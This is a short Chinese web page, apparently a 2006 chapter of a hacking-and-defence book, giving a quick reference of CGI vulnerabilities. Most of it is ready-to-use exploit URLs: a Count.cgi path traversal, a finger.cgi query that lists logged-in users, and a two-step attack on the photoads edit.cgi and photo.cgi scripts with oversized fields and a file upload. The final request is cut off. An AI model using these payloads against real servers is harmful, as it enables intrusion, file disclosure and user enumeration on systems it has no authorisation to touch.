学院首页>安全防御>病毒防治>黑客攻防技术内幕-安全防入侵与防病毒基础(11)

黑客攻防技术内幕-安全防入侵与防病毒基础(11)

作者：来源：添加时间：2006-5-23 8:23:14

3.5 CGI及系统漏洞速查(2)

用Count.cgi看图片：

http://server/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

● finger.cgi

lynx http://www.server/cgi-bin/finger?@localhost

得到主机上登录的用户名。

● JFS

漏洞介绍：利用photoads这个CGI模块攻入主机，可以入侵PCWEEK-LINUX 主机，具体如下：

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name= 11111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&password=

0&CityStPhone=0&Renewed=0"

创建新AD值绕过 $AdNum 的检查后用：

lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111&DataFile=

1&Password=0&FILE_CONTENT=

上一篇：黑客攻防技术内幕-安全防入侵与防病毒基础(10)
下一篇：快乐耳朵——新钓鱼病毒全程追击

站内搜索